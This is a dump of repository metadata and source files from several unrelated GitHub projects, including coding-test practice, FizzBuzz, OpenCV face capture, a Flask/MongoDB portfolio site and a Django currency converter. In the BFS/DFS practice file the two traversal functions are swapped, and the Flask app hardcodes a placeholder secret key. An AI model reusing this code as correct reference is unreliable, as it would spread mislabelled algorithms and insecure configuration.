BFS_12660.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "N,M,V=map(int,input().split())\ng={n+1:[] for n in range(N)}\nfor m in range(M):\n\ta,b = map(int,input().split())\n\tg[a].append(b)\n\tg[b].append(a)\n\ndef bfs(graph, start):\n\tvisited = []\n\tqueue = [start]\n\twhile queue:\n\t\tnode = queue.pop()\n\t\tif node not in visited:\n\t\t\tvisited.append(node)\n\t\t\tqueue.extend(reversed(sorted(g[node])))\n\n\treturn visited\n\ndef dfs(graph, start):\n\tvisited =[]\n\tstack = [start]\n\twhile stack:\n\t\tnode = stack.pop(0)\n\t\tif node not in visited:\n\t\t\tvisited.append(node)\n\t\t\tstack.extend(sorted(g[node]))\n\n\treturn visited\n\nprint(*bfs(g,V))\nprint(*dfs(g,V))" } ]
41
xkfisher/thinkful
https://github.com/xkfisher/thinkful
83f3891a6a3823c9376b2642e32d214801946f3a
160cdde6d533672117d5b2f4775885351634cc33
576f07580af118e4476880f46a832399b377ab6c
refs/heads/master
2021-01-15T10:18:07.904085
2015-06-23T00:22:21
2015-06-23T00:22:21
37,886,951
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5433714985847473, "alphanum_fraction": 0.5646480917930603, "avg_line_length": 21.66666603088379, "blob_id": "4c3d67d3f5cb3a26b340e9c7e5a90440b724e2b5", "content_id": "8befb3156b59a4dd6efb780cac2f90c57cf4a1cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 611, "license_type": "no_license", "max_line_length": 68, "num_lines": 27, "path": "/fizz_buzz/fizzbuzz2.py", "repo_name": "xkfisher/thinkful", "src_encoding": "UTF-8", "text": "import sys\n\n\nprint \"The name of this script is {}\".format(sys.argv[0])\nprint \"User supplied {} arguments at run time\".format(len(sys.argv))\n\ntry:\n n=int(sys.argv[1])\nexcept:\n n=\"not int\"\n\nwhile type(n)!=int:\n try:\n n=int(raw_input(\"enter the upper limit of the count\"))\n except:\n print(\"you have entered non numeric value, try again\")\n \nprint(\"Fizz buzz counting up to {0}\".format(n))\nfor i in range (1,n+1):\n if ((i%3==0) and (i%5==0)):\n print(\"fizzbuzz\")\n elif (i%3==0):\n print (\"fizz\")\n elif (i%5==0):\n print (\"buzz\")\n else:\n print (i)" }, { "alpha_fraction": 0.4204081594944, "alphanum_fraction": 0.4734693765640259, "avg_line_length": 21.363636016845703, "blob_id": "81f8ddedbbe697317983c3117c80b82511d5e7a9", "content_id": "e0d2e6e994e62dbd9af47d01cbaa8dec136a2e91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 245, "license_type": "no_license", "max_line_length": 47, "num_lines": 11, "path": "/fizz_buzz/fizzbuzz.py", "repo_name": "xkfisher/thinkful", "src_encoding": "UTF-8", "text": "n=100\nprint(\"Fizz buzz counting up to {0}\".format(n))\nfor i in range (1,n):\n if ((i%3==0) and (i%5==0)):\n print(\"fizzbuzz\")\n elif (i%3==0):\n print (\"fizz\")\n elif (i%5==0):\n print (\"buzz\")\n else:\n print (i)" } ]
2
shenbanakshetha24/exp10
https://github.com/shenbanakshetha24/exp10
bdbb4692ede0ffdd75da56eb7013b820e1d0653c
498579d6c23d893ec74918fa59a9a01ca291f442
8fa279d7e9d9d2430ea0a4e748db399044264472
refs/heads/master
2020-06-11T09:51:31.023737
2019-06-26T14:43:46
2019-06-26T14:43:46
193,922,997
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5072463750839233, "alphanum_fraction": 0.5797101259231567, "avg_line_length": 10.5, "blob_id": "f514ad97a19a3408b64d615c80514619edc04aa6", "content_id": "b79b1ef9ddbca13e998498175bf1dd3ebbfb5432", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 69, "license_type": "no_license", "max_line_length": 16, "num_lines": 6, "path": "/count.py", "repo_name": "shenbanakshetha24/exp10", "src_encoding": "UTF-8", "text": "num=int(input())\nc=0\nwhile(num>0):\n num=num//10\n c=c+1\nprint(\"%d\"%c)\n" } ]
1
mjschaub/portfolio-site
https://github.com/mjschaub/portfolio-site
8e5b196855bec9926569d1043ab5226b44afd0dc
5248f23e6380d90e050dcfc2388914281df98dd0
2f2c4e4c0a50e984b5863f27784b5ece459b4132
refs/heads/master
2021-01-20T07:07:08.763361
2017-05-01T20:28:15
2017-05-01T20:28:15
89,959,840
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4699481725692749, "alphanum_fraction": 0.49119171500205994, "avg_line_length": 30.129032135009766, "blob_id": "d7f798360f56388bec2eeb5acb27fc26fb01927c", "content_id": "02af8af102d6c20937695a065b19a9502ce58893", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1930, "license_type": "no_license", "max_line_length": 105, "num_lines": 62, "path": "/web/templates/revision_view.html", "repo_name": "mjschaub/portfolio-site", "src_encoding": "UTF-8", "text": "<!-- template from bootstrap: http://getbootstrap.com/2.3.2/examples/hero.html# -->\n<!DOCTYPE html>\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\">\n <title>Portfolio</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n <meta name=\"description\" content=\"\">\n <meta name=\"author\" content=\"\">\n <link href=\"http://getbootstrap.com/2.3.2/assets/css/bootstrap.css\" rel=\"stylesheet\">\n <link href=\"http://getbootstrap.com/2.3.2/assets/css/bootstrap-responsive.css\" rel=\"stylesheet\">\n <style type=\"text/css\">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n </style>\n </head>\n <body>\n <div class=\"navbar navbar-inverse navbar-fixed-top\">\n <div class=\"navbar-inner\">\n <div class=\"container\">\n <a class=\"brand\" href=\"/\">My Portfolio</a>\n </div>\n </div>\n </div>\n <div class=\"container\">\n\t <div class=\"hero-unit\">\n\t <div class=\"row\">\n\t {% for file in files %}\n <div class=\"span4\">\n\t {% if file['kind'] == \"dir\" %}\n\t\t{% if file['path']|length >= 32 %}\n\t <h4>{{file['path'][0:32]+'...'}}</h4>\n\t\t{% else %}\n\t\t<h4>{{file['path']}}</h4>\n\t {% endif %}\n\t\t{% endif %}\n\t {% if file['kind'] != \"dir\" %}\n\t\t{% if file['path']|length >= 43 %}\n \t<h6>File: {{file['path'][0:43]}}</h6>\n\t\t<h6>{{file['path'][43:]}}</h6>\n\t\t{% else %}\n\t\t<h6>File: {{file['path']}}</h6>\n\t\t{% endif %}\n\t <p>size: {{file['size']}}</p>\n\t {% endif %}\n <p>Type of file: {{file['kind']}}</p>\n\t <p>Action: {{file['action']}}</p>\n\t {% if (file['kind'] != \"dir\" and file['action'] != \"D\") %}\n <p><a class=\"btn\" href=\"/projects/{{revision_num}}/{{file['file_id']}}\">View File</a></p>\n\t\t{% else %}\n\t\t<hr width=\"66%\">\n\t {% endif %}\n\t </div>\n {% endfor %}\n\t </div>\n\t </div>\n <hr>\n </div>\n </body>\n</html>\n" }, { "alpha_fraction": 0.5644082427024841, "alphanum_fraction": 0.5713870525360107, "avg_line_length": 29.756755828857422, "blob_id": "4909e7d05f787544c359cfbe5e137bd566aa14c8", "content_id": "587618733f129ec7606aafb3166273dec3614d40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3439, "license_type": "no_license", "max_line_length": 143, "num_lines": 111, "path": "/parser/xml_parser.py", "repo_name": "mjschaub/portfolio-site", "src_encoding": "UTF-8", "text": "'''\nCreated on Mar 6, 2017\n\n@author: mjschaub\n'''\nimport xml.etree.ElementTree as ET\nimport projects.log_entry as le\nimport projects.Project as proj\nimport json\nfrom pymongo import MongoClient\nclient = MongoClient()\n\n\n'''\nParse's the log to retrieve each commit and all the required data from it.\n@param file: the log file to input\n@return: the array of log entries\n'''\ndef parse_log(file):\n e = ET.parse(file).getroot()\n log_entries = []\n #print(e.items())\n for logentry in e.iter('logentry'):\n curr_entry = []\n curr_entry.append(logentry.attrib)\n print(logentry.attrib)\n for auth in logentry.iter('author'):\n print(auth.text)\n curr_entry.append(auth.text)\n for date in logentry.iter('date'):\n print(date.text)\n curr_entry.append(date.text)\n paths = []\n for path in logentry.iter('path'):\n print(path.text)\n paths.append(path.text)\n curr_entry.append(paths)\n path_attribs =[]\n for path in logentry.iter('path'):\n print(path.attrib)\n path_attribs.append(path.attrib)\n curr_entry.append(path_attribs)\n for msg in logentry.iter('msg'):\n print(msg.text)\n curr_entry.append(msg.text)\n log_entries.append(curr_entry)\n return log_entries\n'''\nparse's the list xml file but for my implementation I only fetched the size of each file from the list as the log had all the other information\n@param file: the list file\n@param path_name: the path of the file to get the size of\n@return: the size of the file\n''' \ndef parse_list(file, path_name):\n \n e = ET.parse(file).getroot()\n ret_size = 0\n for entry in e.iter('entry'):\n name = ''\n for i in entry.iter('name'):\n name = i.text\n if name == path_name:\n for i in entry.iter('size'):\n ret_size = i.text\n\n return ret_size\n\n\nif __name__ == '__main__':\n \n list_file = 'svn_list.xml'\n log_file = 'svn_log.xml'\n \n entries = parse_log(log_file)\n \n db = client['portfolio']\n files = db['files']\n logs = db['logs']\n entry_objs = []\n curr_id = 0\n print(db['files'].count())\n print(db['logs'].count())\n db['files'].remove({})\n db['logs'].remove({})\n print(db['files'].count())\n for i in range(len(entries)):\n x = entries[i]\n kinds = [my_dict['kind'] for my_dict in x[4]]\n actions = [my_dict['action'] for my_dict in x[4]]\n projects = []\n for i in range(len(x[3])):\n curr_path = x[3][i]\n size_to_add = 0\n if kinds[i] == 'file':\n size_to_add = parse_list(list_file,curr_path.replace('/mjschau2/',''))\n svn_link = str('https://subversion.ews.illinois.edu/svn/sp17-cs242'+curr_path+'/?p='+x[0]['revision'])\n temp_proj = proj.Project(curr_path,size_to_add,actions[i],kinds[i], text=svn_link,file_id=curr_id)\n result = files.insert_one(temp_proj.__dict__)\n #print(result)\n curr_id+=1\n projects.append(temp_proj.__dict__)\n temp_obj = le.log_entry(int(x[0]['revision']),x[1],x[2],x[5],projects)\n entry_objs.append(temp_obj.__dict__)\n \n project_data = entry_objs\n \n \n #now put up on mongodb database\n \n result = logs.insert_many(project_data)\n print(result.inserted_ids)\n \n \n \n \n \n" }, { "alpha_fraction": 0.601214587688446, "alphanum_fraction": 0.6041385531425476, "avg_line_length": 30.53900718688965, "blob_id": "71c19ade2dbfb9d4a740f6949a11b073fd554c99", "content_id": "e2b4b9dbed4ed62c1fd37dac3c84a8f9c5526c99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4446, "license_type": "no_license", "max_line_length": 138, "num_lines": 141, "path": "/web/server.py", "repo_name": "mjschaub/portfolio-site", "src_encoding": "UTF-8", "text": "'''\nCreated on Mar 7, 2017\n\n@author: mjschaub\n'''\n\n\nfrom flask import Flask,render_template, abort, request\nfrom pymongo import MongoClient\nfrom bson.objectid import ObjectId\n\nclient = MongoClient()\napp = Flask(__name__)\n\n\n'''\nroutes to the homepage\n@return the render html template for the index page\n'''\[email protected]('/')\ndef home_page():\n return render_template('index.html')\n'''\nroutes the project view page where you see all of the commits made\n@return the html template for the page\n'''\[email protected]('/projects')\ndef assignment_page():\n return render_template('log_view.html',portfolio=portfolio)\n'''\nroutes the invidual commit page for the certain revision number\n@return the html template for this page\n'''\[email protected]('/projects/<revision_num>')\ndef project_page(revision_num=0):\n logs = db['logs'].find()\n for i in logs:\n if int(i['revision']) == int(revision_num):\n files = i['files']\n return render_template('revision_view.html',files=files,revision_num=revision_num)\n\n'''\n routes the app for the individual file page where you do the commenting\n @param the route of the site\n @return the html template to use\n ''' \[email protected]('/projects/<revision_num>/<file_id>', methods=['POST','GET'])\ndef file_page(file_id=0,revision_num=0):\n \n db = client['portfolio']\n comments = db['comments']\n \n if request.method == 'POST':\n \n user = request.form['username']\n comment = request.form['comment']\n \n comment = cleanup_comment(comment)\n print({'status':'OK','user':user,'comment':comment})\n if request.form['type-of-comment'] == \"normalComment\":\n #add comment\n result = comments.insert_one({'user':user,'comment':comment,'file_id':file_id,'reply_id':-1,'replies':[]})\n print(result)\n else:\n #reply comment\n reply_id = request.form['type-of-comment']\n print('reply id: ',reply_id)\n result = comments.insert_one({'user':user,'comment':comment,'file_id':file_id,'reply_id':reply_id,'replies':[]})\n new_comment = comments.find({'user':user,'comment':comment})\n reply_comment = comments.find({'_id': ObjectId(reply_id)})\n \n for i in reply_comment:\n comments.update({'_id' : ObjectId(reply_id)}, { '$push': {'replies' : new_comment[0]}})\n \n\n file_given = None\n path = None\n files = db['files'].find()\n for i in files:\n if int(i['file_id']) == int(file_id):\n path = i['path']\n file_given = i['text']\n \n if file_given == None:\n return abort(500)\n \n comments = comments.find()\n page_comments = []\n for i in comments:\n if i['file_id'] == file_id:\n page_comments.append(i)\n print(i)\n\n return render_template('project.html',path=path,file=file_given,file_id=file_id,page_comments=page_comments,revision_num=revision_num)\n\n'''\nmethod to check each comment does not contain the filtered text and if it does then relace it with the good words\n@param comment_text: the comment to filter\n@return the new comment\n'''\ndef cleanup_comment(comment_text):\n db = client['portfolio']\n word_filter = db['filter'].find()\n \n for i in word_filter:\n for j in range(len(i['bad_words'])):\n print(i['bad_words'][j])\n if i['bad_words'][j] in comment_text:\n print(\"old text: \",comment_text)\n comment_text = comment_text.replace(i['bad_words'][j],i['good_words'][j])\n print(\"new_text: \",comment_text)\n \n return comment_text\n\n'''\nsets up the database to have the filtered words in it, is run once to create the data\n'''\ndef setup_bad_words():\n bad_words = ['moist','patriots','ugly','justin bieber','bing']\n good_words = ['wet','worst team ever', 'beautiful','he who shall not be named','google']\n db = client['portfolio']\n word_filter = db['filter']\n \n word_filter.insert_one({'bad_words':bad_words,'good_words':good_words })\n check_filter = db['filter'].find()\n for i in check_filter:\n print(i)\n \n\nif __name__ == \"__main__\":\n \n db = client['portfolio']\n portfolio = db['logs'].find()\n files = db['files'].find()\n comments = db['comments'].find()\n #setup_bad_words()\n \n app.secret_key = 'super secret key'\n app.config['SESSION_TYPE'] = 'mongodb'\n \n app.run()" }, { "alpha_fraction": 0.5035971403121948, "alphanum_fraction": 0.5203837156295776, "avg_line_length": 18, "blob_id": "44613942122817bcfde2fcd829a164f77cae28d2", "content_id": "b92e2b7efb01a1f1e4841cffa7e58e4753a60255", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 417, "license_type": "no_license", "max_line_length": 76, "num_lines": 22, "path": "/projects/Project.py", "repo_name": "mjschaub/portfolio-site", "src_encoding": "UTF-8", "text": "'''\nCreated on Mar 8, 2017\n\n@author: mjschaub\n'''\n\nclass Project(object):\n '''\n the project object\n '''\n\n\n def __init__(self,path='',size=0, action='',kind='', text='',file_id=0):\n '''\n Constructor to initialize a project\n '''\n self.path = path\n self.size = size\n self.action = action\n self.kind = kind\n self.text=text\n self.file_id = file_id" }, { "alpha_fraction": 0.8025477528572083, "alphanum_fraction": 0.8025477528572083, "avg_line_length": 155.3333282470703, "blob_id": "dbd791f78a7f5ce8722781f4aee49fe365b8c3e2", "content_id": "56bc29ff2fc8de7c257f813f51b29b4f817a21d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 471, "license_type": "no_license", "max_line_length": 450, "num_lines": 3, "path": "/README.md", "repo_name": "mjschaub/portfolio-site", "src_encoding": "UTF-8", "text": "# portfolio-site\n\nA portfolio site of every commit I made in my programming studio class. It parses data from subversion, places the information into commits and lets you view each iteration of each project, including the code, size, and lets you comment on a file. The backend parser will upload the commit and file information to a mongodb database started up on the default port and the site will use that database for the portfolio as well as the comment sections. \n" }, { "alpha_fraction": 0.5653631091117859, "alphanum_fraction": 0.6067039370536804, "avg_line_length": 19.363636016845703, "blob_id": "f35f0f7cc5b53b587e87fb59d63fa9cf3318bece", "content_id": "4f852e6cef512e7e24ac0cc38a8f71f650ec62da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 895, "license_type": "no_license", "max_line_length": 71, "num_lines": 44, "path": "/tests/testFlask.py", "repo_name": "mjschaub/portfolio-site", "src_encoding": "UTF-8", "text": "'''\nCreated on Mar 12, 2017\n\n@author: mjschaub\n'''\n\nimport unittest,requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\n\n'''\nThe api testing class\n'''\nclass Test(unittest.TestCase):\n\n '''\n sets up the parameters\n '''\n def setUp(self):\n\n self.baseURL = 'http://localhost:5000'\n \n\n '''\n tests the endpoints for the portfolio website\n '''\n def test_gets(self):\n \n r = requests.get(self.baseURL+'/')\n self.assertEqual(r.status_code,200)\n r2 = requests.get(self.baseURL+'/projects')\n self.assertEqual(r2.status_code,200)\n r2 = requests.get(self.baseURL+'/projects/12')\n self.assertEqual(r2.status_code,200)\n r2 = requests.get(self.baseURL+'/projects/984028')\n self.assertEqual(r2.status_code,500)\n \n\n\nif __name__ == \"__main__\":\n \n \n \n unittest.main()" }, { "alpha_fraction": 0.5667550563812256, "alphanum_fraction": 0.6122900247573853, "avg_line_length": 51.627906799316406, "blob_id": "0f78ee4d9fb578a7eabf46481cbcdc3362c53f32", "content_id": "7cc94e620d5e165cff3f413a956792e54e8a7bfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2262, "license_type": "no_license", "max_line_length": 560, "num_lines": 43, "path": "/tests/testParser.py", "repo_name": "mjschaub/portfolio-site", "src_encoding": "UTF-8", "text": "'''\nCreated on Mar 12, 2017\n\n@author: mjschaub\n'''\nimport unittest\nimport parser.xml_parser as parse\n\n\nclass Test(unittest.TestCase):\n\n '''\n tests that parsing the log returns a list of entries and each entry has the correct information\n '''\n def testParseLog(self):\n entries = parse.parse_log('test_log.xml')\n self.assertEqual(len(entries),1)\n self.assertEqual(entries[0][0]['revision'],u'6401')\n self.assertEqual(entries[0][1],u'mjschau2')\n self.assertEqual(entries[0][2],u'2017-03-06T16:59:20.880790Z')\n self.assertEqual(entries[0][3],['/mjschau2/Assignment2.1', '/mjschau2/Assignment2.1/Actor.py', '/mjschau2/Assignment2.1/CreateGraph.py', '/mjschau2/Assignment2.1/Graph.py', '/mjschau2/Assignment2.1/GraphVis.py', '/mjschau2/Assignment2.1/Graph_API.py', '/mjschau2/Assignment2.1/Movie.py', '/mjschau2/Assignment2.1/Test_Api.py', '/mjschau2/Assignment2.1/Test_Graph.py', '/mjschau2/Assignment2.1/Testing Plan Assignment #2.docx', '/mjschau2/Assignment2.1/graph_data.json', '/mjschau2/Assignment2.1/graph_setup.log', '/mjschau2/Assignment2.1/graphics.py'])\n self.assertEqual(entries[0][4],[{'action': 'A', 'kind': 'dir'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}])\n self.assertEqual(entries[0][5],u'importing assignment 2.1')\n \n \n pass \n '''\n tests that you can get the size of a file from the list xml (that's all I get from the list)\n '''\n def testParseList(self):\n entry = parse.parse_log('test_log.xml')\n curr_path = entry[0][3][0]\n size1 = parse.parse_list('test_list.xml',curr_path.replace('/mjschau2/',''))\n self.assertEqual(size1, 0)\n curr_path = entry[0][3][1]\n size1 = parse.parse_list('test_list.xml',curr_path.replace('/mjschau2/',''))\n self.assertEqual(size1, u'1623')\n \n pass\n\nif __name__ == \"__main__\":\n \n unittest.main()" }, { "alpha_fraction": 0.5253682732582092, "alphanum_fraction": 0.5351881980895996, "avg_line_length": 21.148147583007812, "blob_id": "c9352417b2e1124089ae3ec8b3819b396ed47af3", "content_id": "abe10952ff5c83d65bf231f2ea3168f08c0a8172", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 611, "license_type": "no_license", "max_line_length": 73, "num_lines": 27, "path": "/projects/log_entry.py", "repo_name": "mjschaub/portfolio-site", "src_encoding": "UTF-8", "text": "'''\nCreated on Mar 7, 2017\n\n@author: mjschaub\n'''\n\nclass log_entry(object):\n '''\n log_entry class for each commit\n '''\n\n def __init__(self,revision = 0, author='',date='',msg='',files = []):\n '''\n Constructor\n '''\n self.author = author\n self.date = date\n self.revision = revision\n self.msg = msg\n self.files = files\n '''\n sets the size of the file or directory\n @param path: path of the file to change\n @param size: the size of the file\n '''\n def set_size(self,path_idx,size):\n self.size[path_idx] = size\n \n " } ]
8
or2008/slideshow_project
https://github.com/or2008/slideshow_project
3a02354b7a78087affe98dbd75c59af4ab22c3e8
ed74abc37977cf8f909b49bb6bfaf0b59b60a7e1
a5ef0763cc8fce128ba9d5aebbcbd31407140245
refs/heads/master
2021-01-23T15:42:03.891960
2013-02-20T08:25:29
2013-02-20T08:25:29
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7025495767593384, "alphanum_fraction": 0.7025495767593384, "avg_line_length": 28.41666603088379, "blob_id": "63c03774d0e7a38f6936d1aed6c3d4527f67cd3b", "content_id": "5ceb8149cbe94d0f35b57f499d12c1c07cd5aab1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 353, "license_type": "no_license", "max_line_length": 49, "num_lines": 12, "path": "/src/slideshow/core/views.py", "repo_name": "or2008/slideshow_project", "src_encoding": "UTF-8", "text": "# Create your views here.\nfrom django.http import HttpResponse, HttpRequest\nfrom django.template import Context, loader\nfrom slideshow.core.models import Slideshow\n\ndef home(request):\n t = loader.get_template('index.html')\n c = Context({\n 'title': \"Slideshow Project!\",\n 'user': request.user,\n})\n return HttpResponse(t.render(c))\n" }, { "alpha_fraction": 0.4571428596973419, "alphanum_fraction": 0.4571428596973419, "avg_line_length": 17, "blob_id": "8c183a94b524fbc22e781e97a3405b340c611015", "content_id": "05979cb90ae5979b125e0d678cd8f0061324c28b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 35, "license_type": "no_license", "max_line_length": 17, "num_lines": 2, "path": "/README.md", "repo_name": "or2008/slideshow_project", "src_encoding": "UTF-8", "text": "slideshow_project\n=================" } ]
2
ganeshlore/currency-converter
https://github.com/ganeshlore/currency-converter
b4dcfc801440206b1f7369a214ae36a4ca5c1a6e
8e3f5687b6cc1daa5fe12796fa91282179a5d31f
b5012a22331a99221741638fce99c02843c86f8b
refs/heads/master
2022-11-28T05:34:09.931620
2020-08-01T14:31:40
2020-08-01T14:31:40
284,271,638
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7125645279884338, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 37.733333587646484, "blob_id": "1ce2994edba8e734476c265047054c23b72ebe8d", "content_id": "61ff31f56ab4a83eb7d40aac3ad20dca23223620", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 581, "license_type": "no_license", "max_line_length": 76, "num_lines": 15, "path": "/google_apis/views.py", "repo_name": "ganeshlore/currency-converter", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.http import HttpResponse\nfrom google_currency import convert\nimport json \n# Create your views here.\ndef convert_currency(request):\n # Get Params\n from_country = request.GET.get('from')\n to_country = request.GET.get('to')\n amount = request.GET.get('amount')\n data = convert(from_country if from_country else 'usd',\n to_country if to_country else 'inr',\n int(amount) if amount is not None and amount .isnumeric() else 1)\n return JsonResponse(json.loads(data))\n" }, { "alpha_fraction": 0.7352941036224365, "alphanum_fraction": 0.7352941036224365, "avg_line_length": 23.428571701049805, "blob_id": "a3599a244d764629b7b183c9d5c0197d6ced0b57", "content_id": "ad7ddd7a76c955a7212fd9e0b2b6c8d8f0434670", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 170, "license_type": "no_license", "max_line_length": 77, "num_lines": 7, "path": "/google_apis/urls.py", "repo_name": "ganeshlore/currency-converter", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . import views\n\napp_name = 'google_apis'\nurlpatterns = [\n path('convert_currency', views.convert_currency, name='convert_currency')\n]" }, { "alpha_fraction": 0.6776859760284424, "alphanum_fraction": 0.6804407835006714, "avg_line_length": 32, "blob_id": "e90119174c062db718a9a7eb2fc2cae84c305a08", "content_id": "f5e9729bdaab941ee8cc41b3dd606039e3cc8f94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 363, "license_type": "no_license", "max_line_length": 71, "num_lines": 11, "path": "/currency/views.py", "repo_name": "ganeshlore/currency-converter", "src_encoding": "UTF-8", "text": "# from django.shortcuts import render\n# # from .models import Search,\n\n# # Create your views here.\n\n\n# def index(request):\n# # latest_search_result = Search.objects.order_by('-pub_date')[:5]\n# # context = {'latest_search_result':latest_search_result}\n# # return render(request,'scrapper/index.html',context)\n# return render(request, 'index.html')\n" } ]
3
sacharya99/img_cls
https://github.com/sacharya99/img_cls
88adc32d40cd8ecf081709d9eac7f13c12b4314d
9ce5720d284b6435bc2c1bfd9d54700bdc8e4e83
a93a5067c3df4efacb2868415260302eab067697
refs/heads/master
2021-06-28T08:02:14.630382
2021-05-31T03:47:23
2021-05-31T03:47:23
229,692,654
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.559967577457428, "alphanum_fraction": 0.6126418113708496, "avg_line_length": 20.867923736572266, "blob_id": "6a9b03edbb645ad8291c71a0e9ab5e5a3f859352", "content_id": "56b0ce1889cb633380cd486221c58d401ecd7d42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1234, "license_type": "no_license", "max_line_length": 103, "num_lines": 53, "path": "/face_recognition.py", "repo_name": "sacharya99/img_cls", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Dec 19 14:58:02 2019\r\n\r\n@author: Sayak\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\nface_classifier=cv2.CascadeClassifier(r\"D:\\Datasets\\data\\haarcascades\\haarcascade_frontalface_alt.xml\")\r\n\r\ndef face_extractor(img):\r\n gray=cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n faces=face_classifier.detectMultiScale(gray,1.3,5)\r\n \r\n\r\n\r\n\r\n if faces is():\r\n return None\r\n\r\n for(x,y,w,h) in faces:\r\n cropped_face=img[y:y+h,x:x+w]\r\n \r\n return cropped_face\r\n\r\ncap=cv2.VideoCapture(0)\r\ncount=0\r\n\r\nwhile True:\r\n ret,frame=cap.read()\r\n if face_extractor(frame) is not None:\r\n count+=1\r\n face=cv2.resize(face_extractor(frame),(200,200))\r\n face=cv2.cvtColor(face,cv2.COLOR_BGR2GRAY)\r\n\r\n file_name_path=r\"D:\\Datasets\\face2\\\\\"+str(count)+'.jpg'\r\n cv2.imwrite(file_name_path,face)\r\n\r\n cv2.putText(face,str(count),(50,50),cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)\r\n cv2.imshow('Face Cropper',cv2.resize(face,(400,400)))\r\n \r\n else:\r\n print(\"Face not found!!\")\r\n pass\r\n \r\n if cv2.waitKey(25)==ord('q') or count==100:\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\nprint('Collecting Samples complete!!')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n " } ]
1
mariuspod/safe-transaction-service
https://github.com/mariuspod/safe-transaction-service
c09b325de0ce046fb5a899fea931df658d8263b1
c91f945b86ca3e37aaffad17fc8d493840c9770f
6e1d701c9ed3ae78c86776185c1addf641b0e477
refs/heads/master
2023-06-01T17:59:11.128049
2021-06-16T13:03:39
2021-06-16T13:03:39
377,118,147
0
0
MIT
2021-06-15T10:07:31
2021-06-14T14:02:02
2021-06-15T10:02:36
null
[ { "alpha_fraction": 0.6761133670806885, "alphanum_fraction": 0.6761133670806885, "avg_line_length": 35.592594146728516, "blob_id": "e269dbbffaaed978150a70e7f05daa21e6f9b4c7", "content_id": "84caff59f4b1b25900a641fa388a900b9acd33e4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 988, "license_type": "permissive", "max_line_length": 119, "num_lines": 27, "path": "/safe_transaction_service/contracts/management/commands/sync_contract_abis.py", "repo_name": "mariuspod/safe-transaction-service", "src_encoding": "UTF-8", "text": "from django.core.management.base import BaseCommand\n\nfrom gnosis.eth import EthereumClientProvider\n\nfrom ...models import Contract\n\n\nclass Command(BaseCommand):\n help = 'Sync contract names/ABIS scraping from etherscan/sourcify'\n\n def add_arguments(self, parser):\n parser.add_argument('--all', help=\"Sync contract names/ABIS for contracts already synced\", action='store_true',\n default=False)\n\n def handle(self, *args, **options):\n every_contract = options['all']\n\n ethereum_client = EthereumClientProvider()\n network = ethereum_client.get_network()\n\n contract_queryset = Contract.objects.all()\n if not every_contract:\n contract_queryset = contract_queryset.filter(contract_abi=None)\n\n for contract in contract_queryset:\n if contract.sync_abi_from_api(network=network):\n self.stdout.write(self.style.SUCCESS(f'Synced contract {contract.address} - {contract.name}'))\n" }, { "alpha_fraction": 0.5633803009986877, "alphanum_fraction": 0.7042253613471985, "avg_line_length": 16.75, "blob_id": "f1b6fd26514b8741e4d3e79777934ae9296978ee", "content_id": "e27b3d2f4b2bb3a203e0c4f255375664b5e306c4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 142, "license_type": "permissive", "max_line_length": 20, "num_lines": 8, "path": "/requirements-test.txt", "repo_name": "mariuspod/safe-transaction-service", "src_encoding": "UTF-8", "text": "-r 